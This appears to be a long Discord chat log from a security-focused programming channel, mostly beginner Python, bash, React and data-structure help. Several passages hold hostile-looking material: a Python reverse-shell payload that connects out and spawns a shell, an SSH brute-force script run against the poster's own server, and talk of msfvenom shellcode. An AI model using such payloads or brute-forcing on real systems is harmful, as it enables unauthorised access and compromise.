To be fair, @clear lodge I just made a pretty disgusting bash command involving grabbing the results of a web service, filtering the resulting JSON, transforming the results with sed and tr and using the results to call n more web services

Guys im learning python how to remove all the strings after the commas like this?

Input:
hello,world
hi, mate
try, hackme

Output:

hello
hi
try

Split on "," and chose the first element

I tried and the output is

hello

you need to iterate over each line - then split each line by , and print out the fist part 🙂

for simpler explanation this shell one liner is doing what you need

$ echo "hello,world\nhi, mate\ntry, hackme" | cut -d "," -f1
hello
hi
try

but if you would remove the break line char \n the output would be just hello 🙂

wanna do it in python

you are reading the whole file into single variable 🙂 you need a loop to go over each line

as mentioned earlier, you'll want a loop there.

I think python has a readlines method on files?

everything is okay now

Thank you guys

you're welcome

with open('file.txt', 'r') as file:
        print([line.split(", ")[0] for line in
file.readlines()])

muhaha

anyone know why this is happening?

Why what is happening

Your code is doing exactly what you are telling it to do

Funny how code does that sometimes

It's almost like interpreting code is a deterministic system

fixed it

it supposed to be

print(f1.result())

yes, are you aware of what you were doing the first time?

yes

what were you doing the first time?

unless the compiler misbehaves :/

@lofty mist Your name sounds Swedish, so I'll assume you are. Is this correct?

nope

Anyone wanna give me a website where i could start learning? Thinking for either Python or web based like HTML,CCS,JS i would prefer a website where there is a learning path if anyone has anything 🙂

@lofty mist My bad

@lilac holly I recommend google's python course. I used it like 12 years ago when I was learning python and it served me well https://developers.google.com/edu/python

Very nice and interactive: https://en.khanacademy.org/

why is paramiko so buggy with threading

bro how do you terminate all threads

once a condition is met

Im trying to bruteforce my own linode machine

2 gb

ssh bruteforce

Im guessing its dropping the packets

Be careful with cloud hardware, the operators may not appreciate it too much 😉

Also ssh brute force is slow

so my code isnt the problem?

its doing the threads

but its just dropping most of my pacckets

Probably killed the server

No like some requests it was dropping

and some requests were working

I don't know what the problem was

Ssh handshakes take a while to negotiate

So the server was busy with one while you send another and it just dropped it

this was the code

the bruteforceSSH()

function was just for connecting

this is the output

the errors just keep going tho

Yeah you're timing out

That means you're hammering the server too hard

no wonder

Yeah and ssh handshakes are super expensive

it does this

@lilac holly ...?

oh shit

I didnt see it

my bad

I was doing print(f1.result)

I didnt use the method

but I realized now

Well now it doesn't like you

yeah

it doesnt like me at all

anyone know where i can find tutorials for questions like these

im not looking for an answer

but i dont know what to search up

"coding IPO tables" gives me no good results

thank you

This is a homework or course assignnment isn't it? Your first step seeking help should be the instructor or TA

the thing is

this class is asynch

no TA

and i can only talk to the teacher on wednesdays

the hw is given on monday

which means if i dont do it in the first two days im alone

but i think i got it

i also dont know where also to ask for help

I get that. But we can't really do anything to verify that you are allowed to ask for help; many school honor codes and student ethics codes consider asking for help in a place like this to be unethical or plagiarism.

oh

you mean like

youre worried im asking for help on a quiz or test or something?

No. As a general rule, we don't help with homework here

Because we cannot verify that you are allowed to ask us for help; regardless of that though, your first point of contact for help would be the instructor. If you have two days to start on it and there is office hours available, I strongly recommend you arrange your schedule to go to those office hours

Is OOP really more secure than Procedural-OP?

I'm reading a lot of this way is dumb, that way is dumb between both ends. Things like "OOP is a mess and difficult to sift through" and others saying "Procedural is insecure and candid with the program's data"

I'm sure there are use cases for both. Idk, i'm really confused by the arguments.

I'm pretty sure most people use both?

im pretty sure most people dont know what their talking bout and its something u can really only figure out on ur own

Classes are "objects", aren't they? It all sounds like a silly argument.

I just watched a 45m video claimming "Object oriented bad and you should feel bad..."

Being this early into it i'm not sure what to think

I think I saw that one as well, if it's the same it was not good examples whatsoever. Read the comments of that video for more context. (Just remember people has strong opinions that are not always based on facts!)

I for one, personally love OOP

Neither is necessarily more or less secure than the other. Secure coding is more about how you’re creating, reading, updating, and processing data.

I think most of the arguments against OOP have to do with the added complexity/verbosity in maintaining a set of well-designed classes, but these aren’t explicitly arguments of security but moreso arguments of productivity and efficiency in software engineering

I think Fireship does a good job of covering a bunch of these “developer hot takes” in this video

https://youtu.be/goy4lZfDtCE

i don't like purism in general. it's usually wrong

thanks for the answers

rip ok

and yeah the guy says Classes aren't the problem but then doesn't explain anything else with example, so i have no idea what point he's trying to make.

idk but it sounded like conjecture

This is a really good response to the OOP conversation and points. Yes, OOP does have some advantages. But it also has a fair amount of disadvantages. Functional code style hasn't quite overtaken OOP in terms of popularity. I think it's a key takeaway, here, that different code paradigms introduce different advantages and disadvantages, and it's important to pick a language for a project based on the use case and expected longevity of the solution.

anyone good with kernel modules and C programming? For some reason when defining a pointer to a syscall function in a header file it's returning a different and wrong address than when it's defined individually in the c file solved needed to add extern to header definition and define in c source

Not inherently

I prefer to be pragmatic and I'll often mix up the paradigms because pure OO (done correctly) is a pain in the arse to navigate

Hii everyone. Any bash shell expert here! I'm stuck with something

send the script that you're stuck with 😄

#! /bin/bash cd /home/kali/suricata/ ls -d rules/*.rules rules=$(cat "/home/kali/suricata/rules/activex.rules" "/home/kali/suricata/rules/adware_pup.rules") for i in "{$rules|awk '/ETPRO/ {print}'}" do echo $i done

I have to make an array then for loop this awk command

#!/bin/bash 
cd /home/kali/suricata/ 
ls -d rules/*.rules 
rules=$(cat "/home/kali/suricata/rules/activex.rules" "/home/kali/suricata/rules/adware_pup.rules") 
for i in "{$rules|awk '/ETPRO/ {print}'}" 
  do echo $i done

just to format it

correct me if I got it wrong

You are right some how! But there are few changes I need to make. But due to lack of knowledge I didn't make it

well tell us, what is it that you want extra

and want the script to do

Ok. Let me explain here.

#! /bin/bash

cd /home/kali/suricata/rules

cat activex.rules | sed '/#alert/d' > activex.rules-1.rules

cat activex.rules-1.rules | awk '/ETPRO/ {print}' > activex.rules-1-refine.rules

rm *-1.rules

echo "done"

this is the script for 1 rules file

but i have to automate this cause there are 53 rules files

is it possible ?

I am on my phone right now, but will look at it when I get to my pc, so you want that done for every file in that folder?

yes

thanks for quick reply.

Gave +1 Rep to @vestal carbon

haven't tested it

but here

#!/bin/bash 
cd /home/kali/suricata/ 
ls -d rules/*.rules 
rules=$("/home/kali/suricata/rules/activex.rules", "/home/kali/suricata/rules/adware_pup.rules") 
for i in $rules
do
    awk '/ETPRO/ {print}' $i >> /home/kali/suricata/rules/$i-new
done

it throw me an error for awk

sorry, here

try the edited code @hearty schooner

same error

what does the error say?

awk: fatal: cannot open file #' for reading: No such file or directory awk: fatal: cannot open file Emerging' for reading: No such file or directory
awk: fatal: cannot open file Threats' for reading: No such file or directory awk: fatal: cannot open file Pro' for reading: No such file or directory
awk: fatal: cannot open file `#' for reading: No such file or directory

what i usually do

cat something.rules | awk '/ETPRO/ {print}' > something-1-refine.rules

it usually work

I see why

will you care to explain me

give me a second

try this 😄

#!/bin/bash 
cd /home/kali/suricata/ 
ls -d rules/*.rules 
rules=("/home/kali/suricata/rules/activex.rules" "/home/kali/suricata/rules/adware_pup.rules") 
for i in "${rules[@]}"
do
    cat $i | awk '/ETPRO/ {print}' > $i-new
done

line 7: /home/kali/suricata/rules//home/kali/suricata/rules/adware_pup.rules-new: No such file or directory

oh yeah

it seems like its not loaded with path

no, it's me being dumb

this should be the one that works 😄

sorry for not being able to fix it in one go @hearty schooner my brain is tired after work today, the edited script just above should do it 😄

it's spammed all over the dir with all over the content of ruless

its ok i'm happy that you are helping me. from another side of world

can you send a picture of the dir 😅

here it is

Oh, hmm, I'll have a look at this later, had to get off the train, I'll ping you when I find something

Sure thanks.

Gave +1 Rep to @vestal carbon

I'm not sure what's wrong with this identifier.

this is straight from msfvenom. Reverse shell

everything's spelled correctly.

Looks fine to me....

@jolly osprey this might be in your wheelhouse. idk what's wrong.

wait.. why is it missing a parentheses ?

Good grief

nvm

It cut half of the thing off the script... apparently you can't copy straight from bash -> windows. Doesn't like that...

might be a clipboard length limit

I'm not understanding why pprint will not "prettify" response headers in stdout:

┌──(proxym㉿HP-DeskJet-3755)-[~/Scripts/Python/Networking]
└─$ ./tcp-client.py http://search.disroot.org 443                                                                                                                                        
    
Select:
        1. Send file
        2. HTTP request

  2

{'Server': 'nginx', 'Date': 'Thu, 22 Sep 2022 01:20:38 GMT', 'Content-Type': 'text/html', 'Content-Length': '264', 'Connection': 'close'}

There's no error, either.

I know that the headers in requests are "Case Insensitive Dicts". Pprint is supposed to work with these.

It's a minor nuisance but I would still like to have nice headers to read.

Not a rat's nest of data... It's a lot worse with larger headers

screw it. Just using urllib instead.

Is there a way to create a rev shell tcp handler with sockets so that pty.spawn works

import sys,socket,os,pty
s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("sh")'

Here is the payload

It is connectjng to a python socket server

Does that work regardless of using PTY?

There’s a lot of sockets missing there

Copied directly from revshells.com yeah it does the connection is made

?

I’m not really sure what you’re trying to do, pty.spawn works doesn’t it?

(No).Thats what im asking. The payload posted above is executed on the client and tries to connect to another python socket server instead of netcat.

Won't pty.spawn spawn the shell locally?

hm yeah. So is there a way to get a shell through python on both ends

(Not talking about the input() and send)

Like a stable shell.

I mean you probably have to spawn it, then forward the inputs and outputs

So no way to have a stable shell like in a netcat conn

anyone knows how to print shell code strictly as a string and not as...well some unicode characters? in c++

cause printing it just displays it as some gibberish

just like how msfvenom prints it out

Knock it out to file in straight binary

Hey guys, so I've been having a super weird issue with AntD UI's Table component. It's a React JS UI library that creates a customizable table component for you. So the way I have it set up it searches the column with the onChange function in the filterdropdown object in the getColumnSearchProps() function. The weird issue i'm having .... is that after a search or change to the input it resets the current page of the table to 1. It seems to happen after the onChange() or search function are finished. It's setting the pagination option ( pagination.current ) to 1 at some point no matter what page the user is on. So I did some test cases. I go to page 3, search by column and as soon as I type anything into the input, it goes to page 1 sometimes resulting in no data found. However , if I manually go back to the page I was on before the data is found and is there. So literally the only issue here is, it is somehow reseting the page to 1 after any attempt and I can not seem to figure out how or why it's doing this. Any help is appreciated. https://ant.design/components/table/#components-table-demo-head I should also mention they call this feature 'Implement a customized column search example via filterDropdown' , also the doc is in broken weird english and very hard to understand at points lol.

I think you are much better off to ask this question in a React or webdev community. But having said that, share some code?

Its literally just the code in the doc pretty much line for line. Ill grab the specific line

Right. It may be by design then

 onChange={(e) => {
 setSelectedKeys(e.target.value ? [e.target.value] : []);
 confirm();
}

This is more or less what i have on my other computer

Tbh it might be, and I'm trying to either prevent that feature or set it after

Ngl , idk what confirm does exaclty. It's an internal function they use to search the column. Lemme see if I can find it

you'll have to do some custom coding then 😉 keep this ready https://ant.design/components/pagination/

Yeah I already have custom pagination set up lmao. Its changing the state of the current page but its not calling the pagination function as far as I can tell with the call stack

did you test that or is that an assumption?

Tested, basically I used the debugger and went though each function call at a time. The page is set to 1 no matter what right after the onChange function finishes

 if (reset) {
      changeEventInfo.resetPagination!();

      // Reset event param
      if (changeInfo.pagination!.current) {
        changeInfo.pagination!.current = 1;
      }
``` Maybe this is it?? https://github.com/ant-design/ant-design/blob/master/components/table/Table.tsx

briefly looking through some SO posts, it looks like this is 'normal' behaviour

I do think its normal, which is weird and doesn't make sense

maybe the library is just ass lmao

yeah well. what can I say

it's not the first time I'd roll my eyes doing React

lol

Haha , the more I learn the more I go..... so why are we doing this again? lmao

no lib is perfect but some things are just annoying 🙂

Well, from a user's perspective it would be extremely annoying to have to realize you're on the wrong page you searched on and then go back to the page you were on. Seems like a design flaw imo

https://stackoverflow.com/questions/69638994/how-to-reset-the-paginations-current-page-when-pagesize-changes-in-ant-design

maybe there is something in this post that can help you figure something out

otherwise I'd still suggest to ask this in a React community, there will be many people there very well versed in react and related libs and I'm sure a lot of them will have run into issues like this ( esp if its default behaviour )

I have and you suprisingly help more lmao , thank you

thats too bad

I didnt watch all of this but may also be helpful: https://www.youtube.com/watch?v=gp0itoGtRTI&ab_channel=CodeWithAamir

I swear this guys is the only person making ant ui vidoes

videos lmao

I wish I could understand this but im too stupid

it looks nice though I think you guys make really cool things!

im leaning python and i wanted to know if we can store 2 variables and how?

character_age = "35"
print("There once was a man name" + character_name + ", ")
print("he was " + character_age + " years old.")
print("but he didn't like being " + character_age + "years old.")

character_name1 = "Michael"
character_age1 = "44"
print(+ character_name1 + " and " +character_name + " where friends.")```


This gives me  an error 
```TypeError: bad operand type for unary +: 'str'```

its bc you have a trailing + at the beginning of your print statement

print(+ character_name1 + " and " +character_name + " where friends.")

still

you have to remove the +

at the beginning

aaah

it worked now

thank you

🙂

nice 🙂

You may want to look into format strings...at least I think they're called that

Especially when the docs make no sense... I swear some of these libs were written by an overcaffeinated 6 year old

yes, or just too minimal! really annoying

What Hydragyrum was saying is when you use ```python
print(f"{character_name1} and {character_name} were friends")

This is called an "f-string" in python. This guide you may find interesting https://realpython.com/python-f-strings/

they're also generally faster than concatenating

Has anyone got a good few ideas as to what I could make with flask? I'm not new to python but wanted to learn flask to broaden my skill set. I already have made a portolfio kind of website. THanks 🙂

build a bug, tracking system, machine learning projects such as fraud detection, filter hacked and no-hacked signal . machine learning is great for cyber security

That's a good idea, I could maybe used open-cv conjoined with flask maybe? Thanks for the idea!

best of luck. any project is great as long as you give it 100% and keep on going into it

Thanks man! I'll make sure to keep at it. I hope you have a good rest of the day!

hey everyone i have a developement related question]
acan i ask?

i basically am intrested in cybersecurity and wanted to learn basic languages and already completed basic python so while practicing problems should i try 10 different sites and feel comfortable withthe good and easy one or would it be considered that i just wandered off without persistence in single website to learn?

Everyone learns at different paces, why don't you start off with one website, than after so many weeks/months, add one or two more, see how you get on.

ok but lets say i start practicing from hackerrank

but then i discover that w3schools has better language and content should i try to learn from there too thats y basic questions

W3schools is a great resource.

I can't say much about hackerrank.

I've heard that W3schools doesn't encourage best practices (Source: the python discord server)

...etc

w3schools is nice for quick reference but I wouldn’t really recommend trying to learn from it

Your best source of example code and such for python basics witll be the official python documentation.

yeah but not in tryhackme

Hey guys, has anyone here been working with selinux MCS?

I want to deploy 3 container that consist of frontend, backend, database

frontend s0:c1
backend s0:c1,c2
database s0:c2

So, the idea is I want to restrict data exfiltration that might be happen on compromised frontend

Is it possible from attacker perspective to evade this restriction? Thanks, any idea for hardening is appreciated 🙂

If it’s deployed to production then place your db in a vpc, enabling monitoring and check your IOPS and monitor your NW calls, sanitise your db. Ensure only your backend has access and authenticate all routes to ur backend

Shall I use traefik for it?

Ya, if I may ask what STACK are you using?? I don’t have much experience with traefik I use Nginx to balance my loads

Go & mysql

There might be multiple platform, so I began with api endpoints first

Which framework of GO as your backend?

Gin

K, are you pooling the connections to your db?

At the moment, no

Consider pooling the connection as it becomes a overhead for your server to create a new connection every time and see to that they are released appropriately, hit your end points with sql injection and check for the response if you see unexpected results then sanitize your db with variables

Don't test for SQLi and fix it if you see it, write safe code from day 1

Golang makes it super easy to use prepared statements.

It's practically easier to do it right than it is to do it wrong

If I am not mistaken there is '?' Statement to prepend value to query

Depends on DBMS

They all do it slightly differently for some cursed reason

Which is where an ORM comes in handy

@tulip sail exactly

Uh, thanks?

So, to recap the sql injection has "already" mitigated with writing "secure code". Selinux preventing container breakout/network pivoting by using different category in presentation layer & backend logic + db. I Still need to sharpen my knowledge with ORM 🙂

Btw, thanks guys

I stumbled into this library https://gorm.io/

No probs,

Can I find a hard-to-break programming language like c#?

Java

C++

Rust?

im using interface library

Metro ui framework

Rust, it’s ensures memory-safety and smaller runtimes

Now my project working c# with metro ui library

How to convert project, rust language

.exe project.

what

Sorry, my English now not good.

Learning 😓

uhhhhhhhh

you uh realize that you use a compiler...that creates an executable?

I think they want to convert their existing C# program into rust?

Oh that makes more sense

Yes that is right

You will have to write it again

You can't just convert it

I can write them it's fine but I don't know how to pass the design.

my friend said you should use javascript.

I said for a moment how could this be?

He showed me the program called Fivem. said look at this based on chromium.

That's very different to writing C# programs with UI frameworks

I just didn't understand that right now.

because we can break and recompile c#.

You will find it easier to ask in a programming discord that speaks your native language

I am pulling the information from api with obj('json').

I wish I had that chance. Knowledgeable people left the country as the software industry came to a standstill.

Ordinary Turkish problems.

yeah so C# and rust are two very different languages, kind of like Turkish and English. it would be like translating one to the other, it just doesn't work that way. Both languages have their own idioms(ways of saying things) that aren't always compatible. Why do you want to convert to rust anyways?

I mean C# is also memory-safe

This very easy recompile,

?

Children can open it with an unpacker and break it very easily.

Evidence to backup your claims?

I think their point is that you can use something like dnSpy and decompile C# back to basically original source because of .NET stuffs

But there are also plenty of obfuscators and VM stuff you can use for anti-analysis 🤷‍♂️

many of them have unpackers.

so they can rewind the encryption and recomplile it

Packers and general obfuscators are not the same thing

And packers don’t necessarily encrypt either

The man opens the program with unpack, makes minor adjustments and uses it. I think the biggest problem for me is to create a private key so that the following data cannot be edited.

However, if this person finds the key to the program, I have no idea what to do.

If he breaks the program and takes the apikey created at each login and sends a manual request to the website with it, then he can reach the current file.

If they can run the program, they can change it

You cannot prevent it

There is a licensing system.

If they don't buy the program, they don't run it.

The problem is that a private key is generated for each login. > programname > checking the duration of the program and sending the information.

If some people somehow access the data from this information system and there is a risk of manually giving the data to the API and pulling the program.

how can i prevent user from accessing data that has been hijacked by the program in any way from the api?

You can't.

I made a few minor configurations to avoid debugging.,

You need to hire a professional

But I still think it's surmountable.

all they say is c# garbage. Use C++ or another language.

damn i don't know how to migrate this c# design to c++.

I don't believe you. You're clearly not talking to actual professionals.

Programming language does not change what is or is not accessible at run time.

I seriously doubt he is a professional but he told me to use javascript or use qb.

I said find a professional and hire them

I did not suggest asking someone who isn't a professional

You're talking about licensing. Licensing (usually) involves money. You need someone who knows what they're doing.

at least avoiding skids will do for now. best if i modify confuserex according to myself, i can manage.

It's not like that bro, if you're available, I'll send you a screenshpt.

You do not understand. You need to hire a real professional here.

You have completely missed the point that James is telling you. You asked an actually impossible question, and refuse to accept that is the case.

Don't send DMs without permission @lilac holly

Shall I post the image here?

No

You should hire a professional

I understand you, but there are no professionals left in the country, they all migrate due to the crisis. I do not know what to do. I better save some money and hire someone. but it seems so hard with this damn currency rate.

You are charging money for this software?

No, I'm developing the program.

Everything is automatic, deposit, rent the program, download and run.

So you intend to charge money.

People will bypass it.

You cannot stop them.

The only problem was asking how to prevent my c# software from breaking easily.

That's getting lost in translation

I'm aware of that, but if I complicate things a little, no one wants to deal with it.

Yep.

This is how the world works.

yes, I understand a little bit, but I read it again with translation.

This is right.

Making it a little harder to crack saves time for me so I can have someone else code better with the money.

I am not sure that you understand the economics behind this

It is seriously difficult to live in a country where the country's currency depreciates 100% in one day against the US dollar.

No one wants to live with high inflation and high exchange rates. not even counting the refugees 😄

I'm not talking international economics. I'm not talking politics.

I don't want to confuse the topic too much, but I'm very grateful for your help. At least I have some knowledge.

You need to find a community that speaks your native language, and you need to hire a professional

I will try my chance. I hope god will help me. see ya

Try cat /etc/passwd | awk -F’:’ ‘{print $1}’

I’m not on my pc to try this, I am using my phone so I am not entirely sure if this would work. Apologies in advanced

Hey just tried this on my work laptop and it works👍. Prints each username on a line. Now putting them into an array and separating by commas and such is out of my league and will require regex.

Can probably sed that to format it

I had a similar issue a short while back but lost my zsh history 😦

It involved sed and awk though, and some tr and maybe some cut

I just came back to paste the regex I found haha

sed ‘s/,$/\n/‘

Hmmm doesnt seem to do anything on my terminal, I’ll look some more. Only because I too am interested

Or else I would say google it haha

Bro this is crazy you can use if else statements in awk. Apparently awk is a scripting language and not just a program or command. Crazy. https://linuxopsys.com/topics/linux-awk-command

after enough research I put together this command that prints any user who has a bash capable shell this is so cool man cat /etc/passwd | awk -F’:’ ‘$0 ~ /bash/ {print $1}’

Or change the bash part to !~ /nologin/ to remove anyone that can’t log in. Same effect sort of but in case their shell isn’t bash you get more results. Sorry for the long spam, this is pretty cool actually haha

any idea why this isn't working? I am trying to make a simple submit form to send text to a server

<!DOCTYPE html>
<html>
<head>
  <title>send data to server</title>
</head>
<body>
  <form  action="send.php" method="POST">
    <p>Input your text</p>
    <input type="text" name="sent_text"></input><br />
    <input type="submit" value="send"></input>
  </form>
</body>
</html>
<?PHP
  if(!empty($_POST['sent_text']))
  {
    $myfile = fopen("output.txt", "w") or die("Unable to open file!");
    if(fwrite($myfile, $_POST['sent_text'])) {
      fclose($myfile);}
      echo "The text has been uploaded";
    } else{
        echo "There was an error uploading the text, please try again!";
    }
  }
?>```

You've got your PHP tags completely outside of the HTML tags, so HTML is not able to load this whilst the page is being rendered. You should look up "How to use PHP in HTML"

Needs to be in the body no?

It worked actually, it was lack of permissions on file write but the code worked, but I believe what you're saying is what causes it to try and run before any input, it tries and fails

where do i start with python

Check the pinned messages 🙂 @vestal carbon has compiled a useful list

Php interpreter is indeed strange

hello guys i want to become really good at algos can you suggest a book, some tips and a site for stuff like this (like TryHackMe but form easy to expert coding problems and algos).

https://github.com/lucastarche/aotd

https://github.com/TheAlgorithms

Good for showing examples / how they are implemented

a beginner programmer here: i had to write a code (practice stuff) that takes 2 last digits of a number, reverse them and return the number

number = int(input('Enter a number: '))  # 81671
two_last_digits = number % 100  # 71
tens = two_last_digits // 10  # 7
ones = two_last_digits % 10 # 1
number -= two_last_digits # subtracting the last 2 digits from a number
print(number + (ones * 10) + tens) #adding 2 last digits in a reverse order into the number

is there a better way to write it without using index/any sort of loops/functions?
PYTHON LANGUAGE

Could use string slicing

This sounds like homework

string slicing uses index

but it really isn't, i'm practicing on one of those sites where you write a code and it does a bunch of tests to see if the code is correct

Leetcode?

There will be other solutions etc you can look at. Lots of different ways in which people have solved it

Id suggest to write your own solution, no matter if its "shitty" and then review the others 😁

What's wrong with a relative index?

i specified without using index/loops/functions tho ;p

And I'm asking what's wrong with a relative index

That's an incredibly arbitrary restriction to add, which means it's most likely you trying to crowdsource your homework rather than going for the most efficient solution

TL;DR: you can make it a one-liner

There are ways to do it, but it's not a beginner solution.

so my code is the most beginner friendly it can get?

I call bs

If you're practicing, you're not doing it right by not using the core fundamentals of a programming language

Don't waste your time writing stuff that doesn't need to be written, you should be improving your skills

Not using loops to create a program is a constraint with 1% chance of happening

steps by steps brother

I have only 2 weeks of real experience in coding

Two weeks is more than enough time to learn loops, if statements and functions

I think you should go back and learn the core fundamentals of every programming language you will come across

And I would recommend to take criticism; Muir and Juun are both two of the best programmers I know, they really know what they're talking about

how do you make a code repeat

like

if you use cout << *

it gives one asterix

but what if you want it to do the same command ten times

nvm

so i'm writing a spider in python as an attempt to improve. however I am unsure on how to implement efficiently an anti-cyclic / anti-repeat check
I have two files, done.txt and todo.txt
I append scraped links to todo.txt, and I would like to check the link is not already inside the file before appending it.
the same goes for done.txt, Before I start scraping a specific url from todo.txt, I would like to verify it hasn't already been scraped (by checking if it's already in done.txt, since after I am done scraping a URL I append it to done.txt)

What are some ways to do this? I thought about using lists but that seems like a very non-performant solution once the list grows bigger and I am iterating over it every time

hash map?

I also cannot iterate over the file, and "pop" or "append" to it dynamically it seems

Dictionary would be fine?

I wouldn't use files, opens you up to issues down the line with threading etc potentially

yeah exactly. I could just continually pump out output every x amount of links scraped into a file (incase it crashes etc.)

so dictionaries are effectively hash maps in python then, right?

Dictionaries are what python calls the hashmap structure https://mail.python.org/pipermail/python-list/2000-March/048085.html

Lawd that link is literally older than me

perfect

haha

I mean, thats a good thing

I still don't understand though how hash maps can be so fast.
I understand that iterating over a list is slow, because you don't have anything indexed so you go through the entire thing until you get (or don't get) a match

So for my use case, where I only need to keep track of URLs, I would have the URLs as value, and the keys as the hashed value of the URL? I'm trying to understand what it is that makes hashmaps so fast

i'm weak on data structures / algos

Maybe use a tree and set a node to visited once visited

so that then when I get a new URL and hash it, how come the look up is so fast?

Don't I still have to iterate over the dict

https://wiki.python.org/moin/TimeComplexity

im looking at this

Hashmap lookups are O(1)

It's basically an array index

and this is faster because I am accessing only 1 element that either exists or doesn't in the dictionary?
How does this work on a computational level, because from where I am standing, I feel like it would still have to iterate over all the indicies to see if theres a match

Ah nevermind it finally clicked

well, at least I think it did

when looking if something exists, I hash it, and check if that key already exists. how does the program know where to look though internally? like

python asks if this key has already an assigned value, and how does the dict actually check that so that its fast? how does it know where to look?

does each key:value pair have a memory address assigned that is getting directly accessed?

Not quite but close enough

More like each bucket has an address assigned to it

I ll go have a look on what buckets are then 😄

you can't map each hash to a spot in memory, there are too many, so you group them in buckets, eg: each hash that starts with say 1f goes in the 1f position

I see

the structure will often iterate from there

so big decrease in time complexity as a result

since you're pre-filtering this

yeah

okay that makes sense, thank you so much

most hashmaps will be O(1) as there's likely to only be one entry per bucket

is there "good" and "bad" practice when it comes to python dicts or hash maps in general? Like I only need to store and access 1 thing, which is the URL. Would it be wrong to use the keys as effectively values, and leave the value portion of the pair empty?

nah, the keys are used as the lookup

well

hmm

meaning I can use it both as lookup and as the value itself

?

why not use a set then

wdym

the set data structure

it's like a list, but duplicates are not allowed

Because I expect to scrape / spider a shitton of links, and I assume this would not be performant

once the set grows bigger

you can search a sorted set very effectively

but perf isn't going to be your main concern unless you have millions of entries, in which case, you'd be using something other than python

not millions

realistically tens of thousands

maybe a few hundred k

in total

python may have issues no matter what you do then

Honestly that's the appropriate structure except cycles can form with navigation links

yeah but if you spot a visited node you know you probably have a cycle

and can prune it appropriately

depends on how you traverse as well

but most sites are hierarchical

would golang be better f.e.?

tbh, probably

anything compiled

I can make python code into an executable as well though. won't it just get translated to C anyways?

I thought it just packaged in the interpreter

I have no clue 😄

in any case, your perf bottleneck will be network, followed by parsing

im okay with the network part, but I'd like to make sure I have efficiently implemented the parsing part, i.e. checking if an URL has already been added to the todo list or scraped

also, beware, beware the premature optimization

what does that mean

should I just run it

and see how it runs

I mean just grabbing the URLs

don't overthink

yeah don't overthink

keep it simple

if you have perf issues, then poke at it

ideally once it's been though an actual profiler

profiler? whats that

it's a tool that can measure what gets executed and how long it takes to execute

thank you ^^

but when coding, readability and maintainability >>>>> perf

in general

very good to know

my first time coding something so its pretty daunting

and I don't know what to prioritize

step 1) make it work

keep it as simple as possible

make sure you can read and understand what your coding.

yeah

alternatively, make sure your grandmother can understand what you're doing

(ok I exaggerate a bit, but a non-technical coworker should be able to get the gist of it)

I understand ^^

thank you so much for the help!!

Don't forget to write tests

I second everything Hydra said here. The only thing I have to add, @plain path , is to write your tests before you write your code. This helps focus in on what exactly you want a function to do, and gives you immediate feedback on whether or not it's doing what you expect.

While TDD is an admirable goal, it can be more difficult

yeah defo harder

but a good practice

so I assume its possible to have multiple buckets on 1 memory address?

otherwise you'd run out of ram super quick

?

@vast swift Do not advertise here.

@vast swift Don't send unsolicited friend requests. Please read the discord rules as you've already broken 2 of them

Not usually, it'll usually be an array

In an ideal world, yeah. Looking at most hash table implementations, chaining is very common, as n^2 memory complexity is not feasible for many smallish data sets

ideally yes

you'll often see a chained hash table which'll get you O(n) memory and probably some O(n) time

Ew ew ew ew ew

No. "Compiled" python isn't actually compiled. As Hydra says it's basically just packaging up the Python interpreter with the scripts and wrapping them in a binary

i.e. it's massive, equally (if not more so) badly performing, and also has a remarkable tendency to trigger AV false positives

Something something script kiddies defaulting to compiling python rather than learning a compiled language

Not a good idea. Do it in C++

(Golang or Rust would be good options though, yes)

C++ good

python bad

Rust ugly

True

F-Off

Also true but it's bloody powerful

Go is fat

True

for maldev or anything remotely useful on windows, python bad

Now that I agree with

F you

Anybody good with Databases? Got a q related to a school group project, while i was sick my group has made some... less than intuitive decisions and i'm outnumbered

I'm happy to discuss database stuff in abstract, but as this is for school, I don't want to overly contaminate your project with my thinking and understanding.

Rusty 😄

trying to write an init script for OpenWRT to reset the clientconfig for radio 2. would this work?

EDIT: It did not.
Edit2, I fixed it.

Ended up reaching out to some experienced friends. Basically, my group decided things like gender, nationality, semester should have their own table, because making that field instead a small int, and referencing the string in the table for the sake of lowing storage. I thought it was dumb and my peers thought it was "a laughably bad idea"

DB normalization is a complex topic; having lookups does reduce the amount of duplicated data, but can significantly increase lookup times. It is up to the implementation team to provide argumentation of the normalization strategy and associated costs.

Oh for sure, their arguments were just weird...

best book to learn javascript?

C++ isn't much better tbh, it's more that we're used to it.

Get outta here with that blasphemy

shrugs

you can't tell me that cout << "stuff" << std::endl; is nice

as opposed to println("stuff")

std:: cout << " stuff " << std::endl; or like if you're using namespace std; then just cout << "stuff \n";
Sorry but I also prefer C++ some what as well, probably because it's the one language I understood perfectly lmao and well, it built up my basis and stuff.

the \n is not recommended 😉

endl will adjust for OS-level newlines

I know but it's fun to use, since it's an escape sequence...

...Are you Houdini or something?

but yes I could use the std namespace

Can a C++ oriented guy learn uh Cyber Security?
I have had my fair share of CS by doing some courses and stuff but all they teach there are how to use kali linux not how to develop programs which is kind of sad, and I'm doing Cyber Security as a hobby, so would I able to learn?

Like I have experience on couple of programming languages but C++ is my favourite oof.

of course

anyone can learn, and as a dev, you may have some interesting insights on how software is coded, and therefore how to break it

I get what you're talking about but I'm talking about using that sense in networking, which is kind of complexed if I'm being honest so I don't know that much about it, I'll take the introduction to security course on this website after I finish doing my 10 days Javascript challenge xd, I'll learn and ask any questions if I stumble upon them xd.

If you have the software developer mindset, namely research; problem decomposition; and computational thinking, I believe learning cyber comes reasonably naturally

I see, I am more of research and problem solving orientated guy, I like research more then anything, might become a data scientist in the future instead of soft-ware developer but oh well, glad to know I would adjust, I'm feeling motivated already, thanks a lot for the help y'all.

shadows answer to your questions shows 365 different algorithms implemented in c++ so if you are looking for some other langauge that might not be ideal.... but it should help you get some idea of how some things work... you could potentially search the github for the algorithm you wanna learn about

How does regex in python match up with plain multi-string or comparison? I mean computationally - in terms of performance

is regex an overkill if I just need a several if checks

if 'something0' or 'something1' or 'something2' in string:
blabla

regex is usually more expensive

you may want to use an actual parser though

Any kind of lexical analysis is going to be costly

ok, any recommendations?

I assume there's tons of libraries in python for parsing all kinds of shit imaginable

i'm parsing urls

Doesn’t python have a built in URL parser?

URLlib

right on, thanks

Okay so i'm at a point where I am pretty happy with the functionality, but I don't understand why does python wait for the program to end (realistically the webspider will never end as I didn't bother with depth yet and I have regex to filter the direction of the crawler) before writing the output to the output files

Does it just buffer a massive output and then flushes it after main exit / CTRL + C?

